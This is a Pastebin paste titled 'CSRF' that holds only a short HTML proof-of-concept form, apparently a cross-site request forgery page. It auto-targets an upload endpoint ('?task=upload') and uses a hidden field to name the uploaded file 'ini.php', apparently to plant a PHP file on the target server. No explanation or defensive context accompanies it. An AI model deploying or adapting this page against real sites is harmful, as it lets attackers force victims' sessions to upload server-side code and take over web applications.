Advertisement
P22DX

CSRF

Oct 18th, 2017
363
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 0.28 KB | None | 0 0
  1. <html>
  2.     <head>
  3.     <body>
  4.         <form method="post" enctype="multipart/form-data" action="localhost/?task=upload">
  5.             <input type="file" name="file" />
  6.  
  7.             <input type="hidden" name="name" value="ini.php" />
  8.  
  9.             <input type="submit" value="submit" />
  10.  
  11.         </form>
  12.     </body>
  13. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement